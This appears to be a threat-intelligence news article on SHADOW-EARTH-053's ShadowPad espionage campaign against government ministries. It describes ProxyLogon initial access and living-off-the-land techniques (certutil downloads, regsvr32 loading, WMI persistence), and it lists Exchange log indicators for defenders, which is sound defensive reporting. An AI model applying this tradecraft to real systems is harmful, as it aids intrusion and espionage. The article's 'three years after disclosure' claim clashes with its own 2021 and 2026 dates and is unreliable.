🛡️ SecOps

China-Linked SHADOW-EARTH-053 Targets Asian Governments and NATO Member With ShadowPad Implants

Security researchers have attributed a sustained intrusion campaign against at least seven government ministries across Southeast and Central Asia — and one NATO member state's foreign affairs ministry — to the China-nexus cluster SHADOW-EARTH-053, operating the ShadowPad remote access trojan. The campaign exploits legacy Microsoft Exchange vulnerabilities for initial access and uses living-off-the-land techniques to evade detection.

4 min read
#china#shadowpad#apt#government-targeting#exchange-server#threat-intelligence#espionage

ESET Research and CrowdStrike have jointly attributed a multi-country intrusion campaign targeting government ministries to the China-nexus cluster designated SHADOW-EARTH-053 — a previously undocumented threat actor assessed to be operating in alignment with Chinese intelligence collection priorities. The campaign, active since at least mid-2025, has compromised at least seven government ministry networks across Southeast and Central Asia, and one NATO member state’s foreign affairs ministry, deploying ShadowPad as the primary persistent access implant.

Campaign Overview

SHADOW-EARTH-053’s initial access methodology relies primarily on exploitation of Microsoft Exchange Server vulnerabilities in environments where on-premises Exchange deployments have not been fully patched. Researchers identified exploitation of the ProxyLogon vulnerability chain (CVE-2021-26855 and CVE-2021-27065) in several victim environments — underscoring that unpatched legacy Exchange servers continue to serve as viable entry points for sophisticated threat actors years after disclosure.

Once initial access is established, the cluster deploys ShadowPad — a modular, plugin-based RAT that has become the shared operational platform of choice across multiple China-linked threat actor clusters since its apparent leak from a Chinese contractor environment in 2017. ShadowPad supports keylogging, credential harvesting, file collection, interactive command execution, lateral movement via Windows management instrumentation (WMI) and PsExec equivalents, and encrypted C2 communication over custom protocols.

Post-compromise activity observed across victims includes systematic collection of diplomatic communications, ministry personnel records, and internal policy documents — consistent with a strategic intelligence collection mission rather than financial motivation.

Living-Off-the-Land Persistence

A defining characteristic of SHADOW-EARTH-053’s tradecraft is extensive use of legitimate Windows administration tooling (LOTL) to blend post-exploitation activity with normal administrative traffic:

  • WMI event subscriptions for persistence, identical to techniques used by several other China-nexus clusters
  • Certutil.exe for downloading additional payloads, exploiting the tool’s legitimate certificate handling functionality
  • Regsvr32.exe for loading ShadowPad DLL components without writing executables to disk
  • Windows Management Instrumentation Command-line (WMIC) for reconnaissance and remote command execution

This LOTL approach makes behavioural detection more challenging than signature-based detection of the ShadowPad binary, which is well-detected by most modern EDR products in its standard form. The cluster uses encrypted, compressed ShadowPad variants that evade static signature detection on several of the observed implants.

ShadowPad’s Broader Significance

ShadowPad’s prominence across China-linked campaigns — used by at least a dozen distinct clusters attributed to different Chinese intelligence and military components — reflects a deliberate shared infrastructure strategy. Multiple threat actors using the same implant complicates attribution, creates shared operational security risks, but also simplifies capability maintenance: a single development team’s improvements benefit all users of the platform.

The continued successful deployment of ShadowPad against government targets in 2026 indicates that neither the platform’s public disclosure nor the availability of signatures has meaningfully degraded its operational effectiveness against insufficiently hardened target environments.

Priority Environment Impact

Organisations running on-premises Microsoft Exchange Server should treat the SHADOW-EARTH-053 campaign as a signal to re-examine their Exchange security posture urgently. The continued exploitation of ProxyLogon variants — three years after the original disclosure — demonstrates that:

  • Significant numbers of Exchange deployments remain unpatched against well-documented vulnerabilities
  • China-nexus actors actively maintain exploitation capabilities for legacy vulnerabilities precisely because unpatched infrastructure remains available
  • Exchange Server’s privileged position in enterprise environments (domain-joined, trusted by Active Directory, rich access to communications) makes it a perennially high-value target

Recommended actions:

  • Run the Microsoft Exchange Health Checker against all on-premises Exchange servers to identify outstanding security updates
  • Review Exchange server IIS logs for indicators of ProxyLogon exploitation: POST requests to /ecp/default.flt, /OAB/ directories, and /autodiscover/ paths from unexpected source IPs
  • Audit Exchange CU (Cumulative Update) status — organisations more than one CU behind the current release are running Exchange configurations Microsoft no longer actively patches
  • Consider migration timeline to Exchange Online — on-premises Exchange’s attack surface is large and the maintenance burden of keeping it fully patched against a sophisticated and persistent threat actor is significant

Share this article